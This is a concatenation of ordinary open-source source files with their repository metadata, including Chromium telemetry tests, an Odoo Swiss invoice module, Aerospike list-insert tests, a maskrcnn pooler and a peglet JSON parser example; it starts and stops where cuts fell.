      self._files.append(path)
    self.has_google_chrome_on_path = False
    outer = self
    def fake_call(*args, **kwargs):  # pylint: disable=W0613
      # Simulates probing for google-chrome: 0 when present, OSError otherwise.
      if outer.has_google_chrome_on_path:
        return 0
      raise OSError('Not found')
    self._stubs.subprocess.call = fake_call

  def testFindAllWithExact(self):
    if not self.CanFindAvailableBrowsers():
      return
    self.assertEquals(
        set(self.DoFindAllTypes()),
        set(['debug', 'release',
             'content-shell-debug', 'content-shell-release']))

  def testFindWithProvidedExecutable(self):
    if not self.CanFindAvailableBrowsers():
      return
    self._finder_options.browser_executable = '/foo/chrome'
    self.assertIn('exact', self.DoFindAllTypes())

  def testFindUsingDefaults(self):
    if not self.CanFindAvailableBrowsers():
      return
    # With a local Release build present, 'release' is reported.
    self.has_google_chrome_on_path = True
    self.assertIn('release', self.DoFindAllTypes())
    # Remove the Release build: fall back to the system google-chrome.
    del self._files[1]
    self.has_google_chrome_on_path = True
    self.assertIn('system', self.DoFindAllTypes())
    # Remove the Debug build too and take Chrome off $PATH: only the
    # content_shell binaries remain.
    self.has_google_chrome_on_path = False
    del self._files[1]
    self.assertEquals(['content-shell-debug', 'content-shell-release'],
                      self.DoFindAllTypes())

  def testFindUsingRelease(self):
    if not self.CanFindAvailableBrowsers():
      return
    self.assertIn('release', self.DoFindAllTypes())
class WinFindTest(FindTestBase):
  """Windows: local builds, per-user installs, and --browser-executable."""
  def setUp(self):
    super(WinFindTest, self).setUp()
    self._stubs.sys.platform = 'win32'
    self._stubs.os.local_app_data = 'c:\\Users\\Someone\\AppData\\Local'
    app_data = self._stubs.os.local_app_data
    for path in ('c:\\tmp\\chrome.exe',
                 '..\\..\\..\\build\\Release\\chrome.exe',
                 '..\\..\\..\\build\\Debug\\chrome.exe',
                 '..\\..\\..\\build\\Release\\content_shell.exe',
                 '..\\..\\..\\build\\Debug\\content_shell.exe',
                 app_data + '\\Google\\Chrome\\Application\\chrome.exe',
                 app_data + '\\Google\\Chrome SxS\\Application\\chrome.exe'):
      self._files.append(path)

  def testFindAllGivenDefaults(self):
    if not self.CanFindAvailableBrowsers():
      return
    self.assertEquals(set(self.DoFindAllTypes()),
                      set(['debug', 'release',
                           'content-shell-debug', 'content-shell-release',
                           'system', 'canary']))

  def testFindAllWithExact(self):
    if not self.CanFindAvailableBrowsers():
      return
    self._finder_options.browser_executable = 'c:\\tmp\\chrome.exe'
    self.assertEquals(
        set(self.DoFindAllTypes()),
        set(['exact',
             'debug', 'release',
             'content-shell-debug', 'content-shell-release',
             'system', 'canary']))
|
boundarydevices/android_external_chromium_org
|
tools/telemetry/telemetry/core/backends/chrome/desktop_browser_finder_unittest.py
|
Python
|
bsd-3-clause
| 7,672
|
from __future__ import print_function
import numpy as np
# Workflow:
#  1) Run dev-tools/mem_counter inside EPW/src
#  2) compile UtilXlib/mem_counter.f90 with -D__DEBUG flag
#  3) Run EPW
#  4) grep ' allocating' epw1.out > alloc.txt
#  5) grep 'deallocating' epw1.out > dealloc.txt
#  6) Run this script (entry counts are detected automatically; the old
#     hard-coded alloc_len/dealloc_len constants are gone)


def _parse_log(path, with_subroutine=False):
    """Parse a grep'ed (de)allocation log.

    Each line is whitespace-split; column 1 is the size and column 4 the
    variable name (column 5 is the allocating subroutine, when requested).
    Sizes are plain Python floats: the deprecated np.float alias (removed
    in NumPy >= 1.20) is no longer used.

    Returns a list of (name, size) or (name, size, subroutine) tuples.
    """
    entries = []
    with open(path, 'r') as log:
        for line in log:
            parts = line.split()
            if with_subroutine:
                entries.append((parts[4], float(parts[1]), parts[5]))
            else:
                entries.append((parts[4], float(parts[1])))
    return entries


def find_unmatched(allocations, deallocations):
    """Return the allocation entries that have no matching deallocation.

    A deallocation matches an allocation when it has the same variable name
    and the same size; every deallocation can be consumed at most once.
    """
    consumed = [False] * len(deallocations)
    unmatched = []
    for entry in allocations:
        name, size = entry[0], entry[1]
        for jj, dealloc in enumerate(deallocations):
            if not consumed[jj] and dealloc[0] == name and dealloc[1] == size:
                consumed[jj] = True
                break
        else:
            # No break hit: this allocation was never freed.
            unmatched.append(entry)
    return unmatched


def main():
    """Match alloc.txt against dealloc.txt and append leaks to mem_analyse.out."""
    allocations = _parse_log('alloc.txt', with_subroutine=True)
    deallocations = _parse_log('dealloc.txt')
    with open('mem_analyse.out', 'a') as out:
        for name, size, subroutine in find_unmatched(allocations, deallocations):
            # The previous version also wrote a "Deallocate:" line using
            # whatever entry the search loop happened to stop on, which was
            # meaningless for an unmatched allocation; it has been dropped.
            out.write('We did not find a maching pair in ' + str(subroutine) + '\n')
            out.write('Allocate: ' + str(name) + ' ' + str(size) + '\n')


if __name__ == '__main__':
    main()
|
QEF/q-e_schrodinger
|
dev-tools/mem_analyse.py
|
Python
|
gpl-2.0
| 1,780
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import re
from odoo import models, fields, api, _
from odoo.exceptions import ValidationError
from odoo.tools.float_utils import float_split_str
from odoo.tools.misc import mod10r
l10n_ch_ISR_NUMBER_LENGTH = 27
l10n_ch_ISR_NUMBER_ISSUER_LENGTH = 12
class AccountInvoice(models.Model):
    """Swiss localization: ISR (inpayment slip with reference) support."""
    _inherit = 'account.invoice'

    l10n_ch_isr_postal = fields.Char(compute='_compute_l10n_ch_isr_postal', help='The postal reference identifying the bank managing this ISR.')
    l10n_ch_isr_postal_formatted = fields.Char(compute='_compute_l10n_ch_isr_postal', help="Postal reference of the bank, formated with '-' and without the padding zeros, to generate ISR report.")
    l10n_ch_isr_number = fields.Char(compute='_compute_l10n_ch_isr_number', store=True, help='The reference number associated with this invoice')
    l10n_ch_isr_number_spaced = fields.Char(compute='_compute_l10n_ch_isr_number', help="ISR number split in blocks of 5 characters (right-justified), to generate ISR report.")
    l10n_ch_isr_optical_line = fields.Char(compute="_compute_l10n_ch_isr_optical_line", help='Optical reading line, as it will be printed on ISR')
    l10n_ch_isr_valid = fields.Boolean(compute='_compute_l10n_ch_isr_valid', help='Boolean value. True iff all the data required to generate the ISR are present')
    # BUG FIX: keyword was misspelled 'defaut', so it was passed as an unknown
    # kwarg and the field had no default value.
    l10n_ch_isr_sent = fields.Boolean(default=False, help="Boolean value telling whether or not the ISR corresponding to this invoice has already been printed or sent by mail.")
    l10n_ch_currency_name = fields.Char(related='currency_id.name', help="The name of this invoice's currency") #This field is used in the "invisible" condition field of the 'Print ISR' button.

    @api.depends('partner_bank_id.bank_id.l10n_ch_postal_eur', 'partner_bank_id.bank_id.l10n_ch_postal_chf')
    def _compute_l10n_ch_isr_postal(self):
        """ Computes the postal reference identifying the bank managing this ISR and formats it accordingly"""
        def _format_isr_postal(isr_postal):
            #format the isr as per specifications
            currency_code = isr_postal[:2]
            middle_part = isr_postal[2:-1]
            trailing_cipher = isr_postal[-1]
            middle_part = re.sub('^0*', '', middle_part)
            return currency_code + '-' + middle_part + '-' + trailing_cipher

        for record in self:
            if record.partner_bank_id and record.partner_bank_id.bank_id:
                isr_postal = False
                if record.currency_id.name == 'EUR':
                    isr_postal = record.partner_bank_id.bank_id.l10n_ch_postal_eur
                elif record.currency_id.name == 'CHF':
                    isr_postal = record.partner_bank_id.bank_id.l10n_ch_postal_chf
                else:
                    #we don't format if in another currency as EUR or CHF
                    continue
                if isr_postal:
                    record.l10n_ch_isr_postal = isr_postal
                    record.l10n_ch_isr_postal_formatted = _format_isr_postal(isr_postal)

    @api.depends('number', 'partner_bank_id.l10n_ch_postal')
    def _compute_l10n_ch_isr_number(self):
        """ The ISR reference number is 27 characters long. The first 12 of them
        contain the postal account number of this ISR's issuer, removing the zeros
        at the beginning and filling the empty places with zeros on the right if it is
        too short. The 15 other characters contain an internal reference identifying
        the invoice. For this, we use the invoice sequence number, removing each
        of its non-digit characters, and pad the unused spaces on the left of
        this number with zeros.
        """
        def _space_isr_number(isr_number):
            # Split into blocks of 5, right-justified, separated by spaces.
            to_treat = isr_number
            res = ''
            while to_treat:
                res = to_treat[-5:] + res
                to_treat = to_treat[:-5]
                if to_treat:
                    res = ' ' + res
            return res

        for record in self:
            if record.number and record.partner_bank_id and record.partner_bank_id.l10n_ch_postal:
                invoice_issuer_ref = re.sub('^0*', '', record.partner_bank_id.l10n_ch_postal)
                invoice_issuer_ref = invoice_issuer_ref.ljust(l10n_ch_ISR_NUMBER_ISSUER_LENGTH, '0')
                invoice_ref = re.sub('[^\d]', '', record.number)
                #We only keep the last digits of the sequence number if it is too long
                # NOTE(review): this truncates to the last 12 digits although the
                # internal part may hold 15 -- confirm this is intentional.
                invoice_ref = invoice_ref[-l10n_ch_ISR_NUMBER_ISSUER_LENGTH:]
                internal_ref = invoice_ref.zfill(l10n_ch_ISR_NUMBER_LENGTH - l10n_ch_ISR_NUMBER_ISSUER_LENGTH)
                record.l10n_ch_isr_number = invoice_issuer_ref + internal_ref
                record.l10n_ch_isr_number_spaced = _space_isr_number(record.l10n_ch_isr_number)

    @api.depends('currency_id.name', 'amount_total', 'partner_bank_id.bank_id', 'number', 'partner_bank_id.l10n_ch_postal', 'partner_bank_id.bank_id.l10n_ch_postal_eur', 'partner_bank_id.bank_id.l10n_ch_postal_chf')
    def _compute_l10n_ch_isr_optical_line(self):
        """ The optical reading line of the ISR looks like this :
                left>isr_ref+ bank_ref>

           Where:
           - left is composed of two ciphers indicating the currency (01 for CHF,
           03 for EUR), followed by ten characters containing the total of the
           invoice (with the dot between units and cents removed, everything being
           right-aligned and empty places filled with zeros). After the total,
           left contains a last cipher, which is the result of a recursive modulo
           10 function ran over the rest of it.

            - isr_ref is the ISR reference number

            - bank_ref is the full postal bank code (aka clearing number) of the
            bank supporting the ISR (including the zeros).
        """
        for record in self:
            if record.l10n_ch_isr_number and record.l10n_ch_isr_postal and record.currency_id.name:
                #Left part
                currency_code = None
                if record.currency_id.name == 'CHF':
                    currency_code = '01'
                elif record.currency_id.name == 'EUR':
                    currency_code = '03'
                units, cents = float_split_str(record.amount_total, 2)
                amount_to_display = units + cents
                amount_ref = amount_to_display.zfill(10)
                left = currency_code + amount_ref
                left = mod10r(left)
                #Final assembly (the space after the '+' is no typo, it stands in the specs.)
                record.l10n_ch_isr_optical_line = left + '>' + record.l10n_ch_isr_number + '+ ' + record.l10n_ch_isr_postal + '>'

    @api.depends('type', 'number', 'partner_bank_id.l10n_ch_postal', 'partner_bank_id.bank_id', 'currency_id.name', 'partner_bank_id.bank_id.l10n_ch_postal_eur', 'partner_bank_id.bank_id.l10n_ch_postal_chf')
    def _compute_l10n_ch_isr_valid(self):
        """Returns True if all the data required to generate the ISR are present"""
        for record in self:
            record.l10n_ch_isr_valid = record.type == 'out_invoice' and\
                record.number and \
                record.l10n_ch_isr_postal and \
                record.partner_bank_id and \
                record.partner_bank_id.l10n_ch_postal and \
                record.l10n_ch_currency_name in ['EUR', 'CHF']

    def split_total_amount(self):
        """ Splits the total amount of this invoice in two parts, using the dot as
        a separator, and taking two precision digits (always displayed).
        These two parts are returned as the two elements of a tuple, as strings
        to print in the report.

        This function is needed on the model, as it must be called in the report
        template, which cannot reference static functions
        """
        return float_split_str(self.amount_total, 2)

    def isr_print(self):
        """ Triggered by the 'Print ISR' button.
        """
        self.ensure_one()
        if self.l10n_ch_isr_valid:
            self.l10n_ch_isr_sent = True
            return self.env.ref('l10n_ch.l10n_ch_isr_report').report_action(self)
        else:
            raise ValidationError(_("""You cannot generate an ISR yet.\n
                                   For this, you need to :\n
                                   - set a valid postal account number (or an IBAN referencing one) for your company\n
                                   - define its bank\n
                                   - associate this bank with a postal reference for the currency used in this invoice\n
                                   - fill the 'bank account' field of the invoice with the postal to be used to receive the related payment. A default account will be automatically set for all invoices created after you defined a postal account for your company."""))

    def action_invoice_sent(self):
        """ Overridden. Triggered by the 'send by mail' button.
        """
        rslt = super(AccountInvoice, self).action_invoice_sent()
        if self.l10n_ch_isr_valid:
            rslt['context']['l10n_ch_mark_isr_as_sent'] = True
        return rslt
|
richard-willowit/odoo
|
addons/l10n_ch/models/account_invoice.py
|
Python
|
gpl-3.0
| 9,277
|
from mpf.tests.MpfTestCase import MpfTestCase
class TestConfigOldVersion(MpfTestCase):
    """Verify that loading a config file lacking a version header fails."""
    def get_config_file(self):
        # Config deliberately missing the version line.
        return 'test_config_interface_missing_version.yaml'
    def get_machine_path(self):
        return 'tests/machine_files/config_interface/'
    def setUp(self):
        # Do NOT call super().setUp() here: the machine boot itself is the
        # operation under test and is expected to raise.
        self.save_and_prepare_sys_path()
    def tearDown(self):
        self.restore_sys_path()
    def test_config_file_with_old_version(self):
        # Booting with a version-less config must raise ValueError.
        self.assertRaises(ValueError, super().setUp)
        self.loop.close()
|
missionpinball/mpf
|
mpf/tests/test_ConfigOldVersion.py
|
Python
|
mit
| 517
|
# -*- coding: utf-8 -*-
import pytest
import sys
import random
from .test_base_class import TestBaseClass
from aerospike import exception as e
# Skip this whole test module when the aerospike client is not installed.
aerospike = pytest.importorskip("aerospike")
try:
    import aerospike
except:
    # NOTE(review): effectively unreachable -- importorskip() above already
    # skipped the module if aerospike is missing; kept for compatibility.
    print("Please install aerospike python client.")
    sys.exit(1)
class TestListInsertItems(object):
    """Integration tests for client.list_insert_items() (list CDT op).

    Positive tests assert the resulting bin contents after the insert;
    negative tests assert the error code/message raised for bad arguments.
    Requires a live Aerospike server (via the as_connection fixture).
    """
    @pytest.fixture(autouse=True)
    def setup(self, request, as_connection):
        """Create the fixture records before each test, remove them after."""
        keys = []
        for i in range(5):
            key = ('test', 'demo', i)
            rec = {'name': 'name%s' %
                   (str(i)), 'age': [i, i + 1], 'city': ['Pune', 'Dehli']}
            self.as_connection.put(key, rec)
            keys.append(key)
        key = ('test', 'demo', 'bytearray_key')
        self.as_connection.put(
            key, {"bytearray_bin": bytearray("asd;as[d'as;d", "utf-8")})
        keys.append(key)
        def teardown():
            """
            Teardown method: drop every record created above, tolerating
            records already removed by the test itself.
            """
            for key in keys:
                try:
                    as_connection.remove(key)
                except e.RecordNotFound:
                    pass
        request.addfinalizer(teardown)
    # Inserting past the end of a list pads the gap with None entries
    # (see the float/unicode cases below).
    @pytest.mark.parametrize("key, field, index, value, expected", [
        (('test', 'demo', 1),  # list of integers
         "age",
         0,
         [500, 1500, 3000],
         {'age': [500, 1500, 3000, 1, 2],
          'name': 'name1', 'city': ['Pune', 'Dehli']}),
        (('test', 'demo', 1),  # list of string
         "city",
         0,
         ["Chennai"],
         {'age': [1, 2], 'name': 'name1',
          'city': ['Chennai', 'Pune', 'Dehli']}),
        (('test', 'demo', 1),  # list of unicode string
         "city",
         3,
         [u"Mumbai"],
         {'age': [1, 2], 'city': ['Pune', 'Dehli', None,
                                  u'Mumbai'], 'name': 'name1'}),
        (('test', 'demo', 2),  # list of float
         "age",
         7,
         [85.12],
         {'age': [2, 3, None, None, None, None, None, 85.12],
          'city': ['Pune', 'Dehli'], 'name': 'name2'}),
        (('test', 'demo', 3),  # list of map
         "age",
         1,
         [{'k1': 29}],
         {'age': [3, {'k1': 29}, 4], 'city': ['Pune', 'Dehli'],
          'name': 'name3'}),
        (('test', 'demo', 1),  # list of bytearray
         "age",
         2,
         [555, bytearray("asd;as[d'as;d", "utf-8")],
         {'age': [1, 2, 555, bytearray(b"asd;as[d\'as;d")],
          'city': ['Pune', 'Dehli'], 'name': 'name1'}),
    ])
    def test_pos_list_insert_items(self, key, field, index, value, expected):
        """
        Invoke list_insert_items() inserts items
        """
        self.as_connection.list_insert_items(
            key, field, index, value)
        (key, _, bins) = self.as_connection.get(key)
        assert bins == expected
    def test_pos_list_insert_items_list_with_correct_policy(self):
        """
        Invoke list_insert_items() inserts list with correct policy
        """
        key = ('test', 'demo', 2)
        policy = {
            'timeout': 1000,
            'retry': aerospike.POLICY_RETRY_ONCE,
            'commit_level': aerospike.POLICY_COMMIT_LEVEL_MASTER
        }
        self.as_connection.list_insert_items(
            key, "age", 5, [45, 50, 80], {}, policy)
        (key, _, bins) = self.as_connection.get(key)
        assert bins == {'age': [2, 3, None, None, None, 45, 50, 80], 'city': [
            'Pune', 'Dehli'], 'name': 'name2'}
    def test_pos_list_insert_items_boolean(self):
        """
        Invoke list_insert_items() insert boolean into the list
        """
        key1 = ('test', 'demo', 1)
        self.as_connection.list_insert_items(key1, "age", 1, [False])
        (_, _, b1) = self.as_connection.get(key1)
        key2 = ('test', 'demo', 2)
        self.as_connection.list_insert_items(
            key2, "age", 1, [False, True])
        (_, _, b2) = self.as_connection.get(key2)
        assert b1['age'] == [1, False, 2]
        assert b2['age'] == [2, False, True, 3]
    def test_pos_list_insert_items_with_nonexistent_key(self):
        """
        Invoke list_insert_items() with non-existent key
        """
        # Random record key so the test never collides with fixture data.
        charSet = 'abcdefghijklmnopqrstuvwxyz1234567890'
        minLength = 5
        maxLength = 30
        length = random.randint(minLength, maxLength)
        key = ('test', 'demo', ''.join(map(lambda unused:
                                           random.choice(charSet),
                                           range(length))) + ".com")
        status = self.as_connection.list_insert_items(key, "abc", 2,
                                                      [122, 878])
        assert status == 0
        (key, _, bins) = self.as_connection.get(key)
        assert status == 0
        assert bins == {'abc': [None, None, 122, 878]}
        self.as_connection.remove(key)
    def test_pos_list_insert_items_with_nonexistent_bin(self):
        """
        Invoke list_insert_items() with non-existent bin
        """
        key = ('test', 'demo', 1)
        charSet = 'abcdefghijklmnopqrstuvwxyz1234567890'
        minLength = 5
        maxLength = 10
        length = random.randint(minLength, maxLength)
        bin = ''.join(map(lambda unused:
                          random.choice(charSet), range(length))) + ".com"
        status = self.as_connection.list_insert_items(
            key, bin, 1, [585, 789])
        assert status == 0
        (key, _, bins) = self.as_connection.get(key)
        assert status == 0
        assert bins == {'age': [1, 2], 'name': 'name1',
                        'city': ['Pune', 'Dehli'], bin: [None, 585, 789]}
    # Negative Tests
    # NOTE(review): the try/except-style negative tests below pass silently
    # when NO exception is raised; pytest.raises would be stricter — confirm
    # whether that leniency is intentional before tightening.
    def test_neg_list_insert_items_with_no_parameters(self):
        """
        Invoke list_insert_items() without any mandatory parameters.
        """
        with pytest.raises(TypeError) as typeError:
            self.as_connection.list_insert_items()
        assert "argument 'key' (pos 1)" in str(
            typeError.value)
    def test_neg_list_insert_items_with_incorrect_policy(self):
        """
        Invoke list_insert_items() with incorrect policy
        """
        key = ('test', 'demo', 1)
        policy = {
            'timeout': 0.5
        }
        try:
            self.as_connection.list_insert_items(
                key, "age", 6, ["str"], {}, policy)
        except e.ParamError as exception:
            assert exception.code == -2
            assert exception.msg == "timeout is invalid"
    def test_neg_list_insert_items_with_extra_parameter(self):
        """
        Invoke list_insert_items() with extra parameter.
        """
        key = ('test', 'demo', 1)
        policy = {'timeout': 1000}
        with pytest.raises(TypeError) as typeError:
            self.as_connection.list_insert_items(
                key, "age", 3, [999], {}, policy, "")
        assert "list_insert_items() takes at most 6 arguments (7 given)" \
            in str(typeError.value)
    def test_neg_ist_insert_items_policy_is_string(self):
        """
        Invoke list_insert_items() with policy is string
        """
        key = ('test', 'demo', 1)
        try:
            self.as_connection.list_insert_items(
                key, "age", 1, [85], {}, "")
        except e.ParamError as exception:
            assert exception.code == -2
            assert exception.msg == "policy must be a dict"
    def test_neg_list_insert_items_key_is_none(self):
        """
        Invoke list_insert_items() with key is none
        """
        try:
            self.as_connection.list_insert_items(None, "age", 1, [45])
        except e.ParamError as exception:
            assert exception.code == -2
            assert exception.msg == "key is invalid"
    def test_neg_list_insert_items_bin_is_none(self):
        """
        Invoke list_insert_items() with bin is none
        """
        key = ('test', 'demo', 1)
        try:
            self.as_connection.list_insert_items(key, None, 2, ["str"])
        except e.ParamError as exception:
            assert exception.code == -2
            assert exception.msg == "Bin name should be of type string"
    def test_neg_list_insert_items_with_items_type_string(self):
        """
        Invoke list_insert_items() insert items is of type string
        """
        key = ('test', 'demo', 1)
        try:
            self.as_connection.list_insert_items(key, "age", 6, "abc")
        except e.ParamError as exception:
            assert exception.code == -2
            assert exception.msg == "Items should be of type list"
    def test_neg_list_insert_items_meta_type_integer(self):
        """
        Invoke list_insert_items() with metadata input is of type integer
        """
        key = ('test', 'demo', 1)
        try:
            self.as_connection.list_insert_items(key, "contact_no", 0,
                                                 [85], 888)
        except e.ParamError as exception:
            assert exception.code == -2
            assert exception.msg == "Metadata should be of type dictionary"
    def test_neg_list_insert_items_index_type_string(self):
        """
        Invoke list_insert_items() insert with index is of type string
        """
        key = ('test', 'demo', 1)
        with pytest.raises(TypeError) as typeError:
            self.as_connection.list_insert_items(
                key, "age", "Fifth", [False])
        assert "an integer is required" in str(typeError.value)
|
aerospike/aerospike-client-python
|
test/new_tests/test_list_insert_items.py
|
Python
|
apache-2.0
| 9,572
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Constant definitions for GRIT.
'''
from __future__ import print_function
# This is the Icelandic noun meaning "grit" and is used to check that our
# input files are in the correct encoding. The middle character gets encoded
# as two bytes in UTF-8, so this is sufficient to detect incorrect encoding.
ENCODING_CHECK = u'm\u00f6l'
# A special language, translations into which are always "TTTTTT".
CONSTANT_LANGUAGE = 'x_constant'
# NOTE(review): presumably a pseudo-locale marker used for fake
# bidirectional (RTL) translations -- confirm against the consumers of
# this constant.
FAKE_BIDI = 'fake-bidi'
# Magic number added to the header of resources brotli compressed by grit. Used
# to easily identify resources as being brotli compressed. See
# ui/base/resource/resource_bundle.h for decompression usage.
BROTLI_CONST = b'\x1e\x9b'
|
endlessm/chromium-browser
|
tools/grit/grit/constants.py
|
Python
|
bsd-3-clause
| 862
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
# Copyright (c) 2018-2019 NVIDIA CORPORATION. All rights reserved.
import torch
import torch.nn.functional as F
from torch import nn
from maskrcnn_benchmark.layers import ROIAlign
from .utils import cat
class LevelMapper(object):
    """Determine which FPN level each RoI in a set of RoIs should map to based
    on the heuristic in the FPN paper.
    """
    def __init__(self, k_min, k_max, canonical_scale=224, canonical_level=4, eps=1e-6):
        """
        Arguments:
            k_min (int): finest FPN level index available
            k_max (int): coarsest FPN level index available
            canonical_scale (int): RoI scale that maps onto canonical_level
            canonical_level (int): level assigned to canonical_scale RoIs
            eps (float): guards log2 against zero-area (degenerate) boxes
        """
        self.k_min = k_min
        self.k_max = k_max
        self.s0 = canonical_scale
        self.lvl0 = canonical_level
        self.eps = eps
    def __call__(self, boxlists):
        """
        Arguments:
            boxlists (list[BoxList])
        Returns:
            int64 tensor of zero-based level indices (0 == k_min), one
            entry per box across all boxlists.
        """
        # Compute level ids; s is sqrt(area), i.e. the box "side length".
        s = torch.sqrt(cat([boxlist.area() for boxlist in boxlists]))
        # Eqn.(1) in FPN paper
        target_lvls = torch.floor(self.lvl0 + torch.log2(s / self.s0 + self.eps))
        # Clamp to the range of levels that actually exist, then rebase so
        # the finest level is index 0.
        target_lvls = torch.clamp(target_lvls, min=self.k_min, max=self.k_max)
        return target_lvls.to(torch.int64) - self.k_min
class Pooler(nn.Module):
    """
    Pooler for Detection with or without FPN.
    It currently hard-code ROIAlign in the implementation,
    but that can be made more generic later on.
    Also, the requirement of passing the scales is not strictly necessary, as they
    can be inferred from the size of the feature map / size of original image,
    which is available thanks to the BoxList.
    """
    def __init__(self, output_size, scales, sampling_ratio):
        """
        Arguments:
            output_size (list[tuple[int]] or list[int]): output size for the pooled region
            scales (list[float]): scales for each Pooler (one per FPN level)
            sampling_ratio (int): sampling ratio for ROIAlign
        """
        super(Pooler, self).__init__()
        # One ROIAlign module per feature-map scale.
        poolers = []
        for scale in scales:
            poolers.append(
                ROIAlign(
                    output_size, spatial_scale=scale, sampling_ratio=sampling_ratio
                )
            )
        self.poolers = nn.ModuleList(poolers)
        self.output_size = output_size
        # get the levels in the feature map by leveraging the fact that the network always
        # downsamples by a factor of 2 at each level.
        lvl_min = -torch.log2(torch.tensor(scales[0], dtype=torch.float32)).item()
        lvl_max = -torch.log2(torch.tensor(scales[-1], dtype=torch.float32)).item()
        self.map_levels = LevelMapper(lvl_min, lvl_max)
    def convert_to_roi_format(self, boxes):
        """Concatenate per-image boxes into one (N, 5) tensor whose first
        column is the image index within the batch, followed by the box
        coordinates — the layout ROIAlign expects.
        """
        concat_boxes = cat([b.bbox for b in boxes], dim=0)
        device, dtype = concat_boxes.device, concat_boxes.dtype
        ids = cat(
            [
                torch.full((len(b), 1), i, dtype=dtype, device=device)
                for i, b in enumerate(boxes)
            ],
            dim=0,
        )
        rois = torch.cat([ids, concat_boxes], dim=1)
        return rois
    def forward(self, x, boxes):
        """
        Arguments:
            x (list[Tensor]): feature maps for each level
            boxes (list[BoxList]): boxes to be used to perform the pooling operation.
        Returns:
            result (Tensor)
        """
        num_levels = len(self.poolers)
        rois = self.convert_to_roi_format(boxes)
        # Non-FPN case: a single feature map pools everything.
        if num_levels == 1:
            return self.poolers[0](x[0], rois)
        levels = self.map_levels(boxes)
        num_rois = len(rois)
        num_channels = x[0].shape[1]
        output_size = self.output_size[0]
        dtype, device = x[0].dtype, x[0].device
        # Pre-allocate the output, then scatter each level's pooled RoIs
        # back into their original row positions so ordering is preserved.
        result = torch.zeros(
            (num_rois, num_channels, output_size, output_size),
            dtype=dtype,
            device=device,
        )
        for level, (per_level_feature, pooler) in enumerate(zip(x, self.poolers)):
            idx_in_level = torch.nonzero(levels == level).squeeze(1)
            rois_per_level = rois[idx_in_level]
            result[idx_in_level] = pooler(per_level_feature, rois_per_level).to(dtype)
        return result
|
mlperf/training_results_v0.6
|
NVIDIA/benchmarks/maskrcnn/implementations/pytorch/maskrcnn_benchmark/modeling/poolers.py
|
Python
|
apache-2.0
| 4,272
|
#!/usr/bin/env python3
"""Run the Flask app, or load it for interactive introspection.

Fixes: removed a leftover debug line (`import sys; print(sys.executable)`,
which duplicated the import and printed on every start) and corrected the
`show(<obj)>` typo in the console banner.
"""
import sys
from pprint import pprint


def show(obj):
    '''Show the dump of the properties of the object.'''
    pprint(vars(obj))


if sys.flags.interactive:
    # `python -i runserver.py`: expose the app's names for poking around.
    from app import *
    print('Loading Flask App in console mode. Use show(<obj>) to introspect.')
elif __name__ == '__main__':
    # Normal execution: start the development server.
    from app import app
    app.debug = True
    app.run(host="0.0.0.0", port=8080)
|
DamnedFacts/flask-boilerplate
|
runserver.py
|
Python
|
bsd-3-clause
| 432
|
# Copyright 2010 Curtis McEnroe <programble@gmail.com>
# Licensed under the GNU GPLv3
class Scope:
    """A lexical scope: a name-to-value mapping with an optional parent.

    Lookups fall back to the parent chain; assignments and deletions only
    ever touch this scope's own bindings (assignment shadows the parent).

    Fix: replaced ``dict.has_key()`` (Python-2-only, removed in Python 3)
    with the ``in`` operator, which is idiomatic on both versions.  The
    public ``has_key`` method is kept for backward compatibility.
    """

    def __init__(self, parent=None):
        # Bindings local to this scope; `parent` is consulted on misses.
        self.bindings = {}
        self.parent = parent

    def __getitem__(self, key):
        # If bound in this scope, return that
        if key in self.bindings:
            return self.bindings[key]
        # Otherwise, look for it in the parent scope
        elif self.parent:
            return self.parent[key]
        # If we have no parent, key is not bound at all
        else:
            raise NameError("name '%s' is not bound" % key)

    def __setitem__(self, key, value):
        # Will shadow any bindings in the parent scope
        self.bindings[key] = value

    def __delitem__(self, key):
        # Removes only this scope's binding; a shadowed parent binding
        # becomes visible again afterwards.
        del self.bindings[key]

    def __repr__(self):
        # For debugging: outermost scope first, innermost bindings last.
        if self.parent:
            return repr(self.parent) + '\n' + repr(self.bindings)
        else:
            return repr(self.bindings)

    def has_key(self, key):
        # True only for bindings in THIS scope (parents are not searched).
        return key in self.bindings
|
magomsk/lispy
|
scope.py
|
Python
|
isc
| 1,055
|
"""
Example: parse JSON.
"""
from peglet import Parser, hug, join, attempt
literals = dict(true=True,
false=False,
null=None)
mk_literal = literals.get
mk_object = lambda *pairs: dict(pairs)
escape = lambda s: s.decode('unicode-escape')
mk_number = float
# Following http://www.json.org/
json_parse = Parser(r"""
start = _ value
object = { _ members } _ mk_object
| { _ } _ mk_object
members = pair , _ members
| pair
pair = string : _ value hug
array = \[ _ elements \] _ hug
| \[ _ \] _ hug
elements = value , _ elements
| value
value = string | number
| object | array
| (true|false|null)\b _ mk_literal
string = " chars " _ join
chars = char chars
|
char = ([^\x00-\x1f"\\])
| \\(["/\\])
| (\\[bfnrt]) escape
| (\\u) xd xd xd xd join escape
xd = ([0-9a-fA-F])
number = int frac exp _ join mk_number
| int frac _ join mk_number
| int exp _ join mk_number
| int _ join mk_number
int = (-?) (0) !\d
| (-?) ([1-9]\d*)
frac = ([.]\d+)
exp = ([eE][+-]?\d+)
_ = \s*
""", **globals())
# XXX The spec says "whitespace may be inserted between any pair of
# tokens, but leaves open just what's a token. So is the '-' in '-1' a
# token? Should I allow whitespace there?
## json_parse('[1,1]')
#. ((1.0, 1.0),)
## json_parse('true')
#. (True,)
## json_parse(r'"hey \b\n \u01ab o hai"')
#. (u'hey \x08\n \u01ab o hai',)
## json_parse('{"hey": true}')
#. ({'hey': True},)
## json_parse('[{"hey": true}]')
#. (({'hey': True},),)
## json_parse('[{"hey": true}, [-12.34]]')
#. (({'hey': True}, (-12.34,)),)
## json_parse('0')
#. (0.0,)
## json_parse('0.125e-2')
#. (0.00125,)
## attempt(json_parse, '0377')
## attempt(json_parse, '{"hi"]')
# Udacity CS212 problem 3.1:
## json_parse('["testing", 1, 2, 3]')
#. (('testing', 1.0, 2.0, 3.0),)
## json_parse('-123.456e+789')
#. (-inf,)
## json_parse('{"age": 21, "state":"CO","occupation":"rides the rodeo"}')
#. ({'age': 21.0, 'state': 'CO', 'occupation': 'rides the rodeo'},)
|
JaDogg/__py_playground
|
reference/peglet/examples/json.py
|
Python
|
mit
| 2,243
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
